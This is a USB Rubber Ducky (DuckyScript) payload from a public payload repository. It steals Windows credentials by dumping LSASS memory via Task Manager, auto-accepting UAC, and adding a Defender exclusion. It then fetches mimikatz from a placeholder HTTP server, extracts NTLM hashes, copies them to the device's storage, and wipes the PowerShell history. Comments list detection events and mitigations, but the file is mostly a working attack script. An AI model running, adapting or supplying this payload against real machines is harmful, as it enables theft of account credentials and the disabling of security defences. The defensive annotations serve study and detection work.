GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/ExfiltrateWindowsCredentials/PhysicalMedium/payload.txt
1
REM Title: DuckyScript payload for data exfiltration over a physical medium
REM Author: jakobfriedl
REM
REM Overview (reviewer note): the steps below dump LSASS memory through Task Manager,
REM parse the dump with mimikatz, and move the results onto the Ducky's own mass-storage
REM volume (label DUCKY) instead of over the network. Host-side footprint a defender can
REM look for, each noted at the step that produces it: a removable volume labelled DUCKY
REM mounting at the same moment keystrokes start, taskmgr.exe writing lsass.DMP into %TEMP%,
REM a Defender exclusion change, a plain-HTTP fetch of mimikatz.exe, and mimikatz.exe
REM reading the dump. Mitigations that stop this chain early: USB device control,
REM LSA Protection (RunAsPPL) / Credential Guard, and Defender Tamper Protection.
REM
REM HID so the device can type; STORAGE so it also enumerates as a mass-storage volume,
REM which is where the exfiltration section writes its files.
ATTACKMODE HID STORAGE

REM OS Detection to ensure the target is Windows
REM Bundled extension (author Korben, see below): waits for the host's lock-LED reply
REM for at most #MAX_WAIT * #CHECK_INTERVAL ms (150 * 20 = 3000 ms), then decides
REM "Windows" from how many USB configuration requests the host sent during enumeration.
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

$_OS = #NOT_WINDOWS

REM Poll until the host has replied to the LED report or the try budget is exhausted.
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
REM More than #WINDOWS_HOST_REQUEST_COUNT configuration requests is taken as Windows.
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
END_EXTENSION

REM Red LED and stop when the host was not detected as Windows: nothing is typed on
REM any other operating system.
IF ($_OS != WINDOWS)
LED_R
STOP_PAYLOAD
END_IF

REM Define the URL of the server hosting the mimikatz executable
REM Placeholder address; the download step below fetches #SERVER_URL/mimikatz.exe over plain HTTP.
DEFINE #SERVER_URL http://XXX.XXX.XXX.XXX

REM Pause before the first keystrokes are typed.
DELAY 1000
REM Delete existing dump file
REM Every GUI r / STRING / ENTER group below is typed through the Run dialog (Win+R).
REM Forensic note: what is typed into Run is recorded per user in the RunMRU list and
REM is not removed by the clean-up section.
GUI r
DELAY 200
STRINGLN powershell "rm $env:TEMP\lsass.DMP"
DELAY 200

REM Create lsass-dump using the TaskManager
REM CTRL-SHIFT ENTER on the Run dialog presumably launches Task Manager elevated and
REM ALT y accepts the UAC prompt (depends on UAC configuration and dialog focus).
REM The DOWNARROW / STRING lsass / SHIFT F10 / five UPARROW / ENTER sequence navigates
REM the process list to lsass and picks a context-menu entry by position; per the REM
REM above, that entry creates the dump, and lsass.DMP in %TEMP% is the file the
REM mimikatz step later reads.
REM Detection: taskmgr.exe opening lsass.exe (Sysmon Event ID 10, ProcessAccess, where
REM Sysmon is deployed) followed by a new lsass.DMP under %TEMP%. Mitigation: with LSA
REM Protection (RunAsPPL) or Credential Guard enabled this step yields no usable secrets.
GUI r
DELAY 200
STRING taskmgr
CTRL-SHIFT ENTER
DELAY 500
ALT y
DELAY 500
DOWNARROW
DELAY 1000
STRING lsass
DELAY 500
SHIFT F10
$I = 0
WHILE ($I < 5)
UPARROW
$I = ($I + 1)
END_WHILE
ENTER
DELAY 500
ENTER
ALT F4

REM Add exclusion path to the Windows Defender settings
REM Second elevated launch, same CTRL-SHIFT ENTER / ALT y pattern, this time a PowerShell
REM console that stays open for the rest of the payload. The exclusion for %TEMP% is only
REM added when real-time protection is on (Get-MpComputerStatus check) and is removed
REM again in the clean-up section.
REM Detection: Set-MpPreference and Remove-MpPreference each log a configuration change
REM (Event ID 5007) in the Microsoft-Windows-Windows Defender/Operational log.
REM Mitigation: Tamper Protection, where enabled, is intended to block this change.
GUI r
DELAY 200
STRING powershell.exe
CTRL-SHIFT ENTER
DELAY 500
ALT y
DELAY 500
STRINGLN if((Get-MpComputerStatus).RealTimeProtectionEnabled){Set-MpPreference -ExclusionPath $env:TEMP}

REM Download mimikatz.exe from webserver
REM wget is the PowerShell alias for Invoke-WebRequest: an outbound plain-HTTP GET from
REM the host, writing mimikatz.exe into the just-excluded %TEMP% (presumably the reason
REM the exclusion is added first).
STRINGLN wget #SERVER_URL/mimikatz.exe -o $env:TEMP\mimikatz.exe
DELAY 1000

REM Execute mimikatz and the necessary commands
REM mimikatz works on the minidump file (sekurlsa::minidump), not on the live process;
REM its `log` command writes all output to exfiltration.log in %TEMP%. CTRL c after the
REM 5 s delay ends the interactive mimikatz session and returns to the PowerShell prompt.
STRINGLN cd $env:TEMP
STRINGLN .\mimikatz.exe "privilege::debug"
STRINGLN log exfiltration.log
STRINGLN sekurlsa::minidump lsass.DMP
STRINGLN sekurlsa::logonpasswords
DELAY 5000
CTRL c
DELAY 500

REM Format mimikatz-log for exfiltration
REM Keeps each "NTLM" line plus the two lines before it (-Context 2,0), de-duplicated,
REM in credentials.txt alongside the full log.
STRINGLN cat .\exfiltration.log | Select-String -Pattern "NTLM" -Context 2,0 | Get-Unique > credentials.txt

REM Getting the drive letter of the USB Rubber Ducky
REM The exfil target is the Ducky's own storage partition, found by its volume label
REM DUCKY -- the same device that is typing. A removable volume with this label
REM mounting at the same time as the keystrokes is itself a signal (USB device-install
REM and volume-mount events on the host).
STRINGLN $d=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter

REM Creating a directory on the USB Rubber Ducky to store the files
REM #exfil_dir is a DuckyScript DEFINE: its PowerShell text is substituted into each
REM STRINGLN #exfil_dir below. The directory name embeds the host's COMPUTERNAME, so the
REM collected files identify the machine they came from. The STRING / SPACE / STRINGLN
REM triplets type one command line each.
DEFINE #exfil_dir $d':/'$env:COMPUTERNAME'-exfiltration-data'
STRING mkdir
SPACE
STRINGLN #exfil_dir

REM Exfiltration
REM Both files are moved (not copied) from %TEMP% onto the removable volume, so after
REM this section only lsass.DMP and mimikatz.exe remain on the host.
STRING mv -Force $env:TEMP\exfiltration.log
SPACE
STRINGLN #exfil_dir
DELAY 1000
STRING mv -Force $env:TEMP\credentials.txt
SPACE
STRINGLN #exfil_dir

REM Clean-up
REM Removes the dump, the binary, the Defender exclusion, the $d variable and the
REM PSReadLine console history file. Responder note: the RunMRU entries, the Defender
REM 5007 events, Sysmon/ETW process-access events and PowerShell script-block logging
REM (Event ID 4104, where enabled) are not touched here and survive this clean-up.
STRINGLN rm $env:TEMP\lsass.DMP
STRINGLN rm $env:TEMP\mimikatz.exe
STRINGLN Remove-MpPreference -ExclusionPath $env:TEMP
STRINGLN Clear-Variable -Name d
STRINGLN rm (Get-PSReadLineOption).HistorySavePath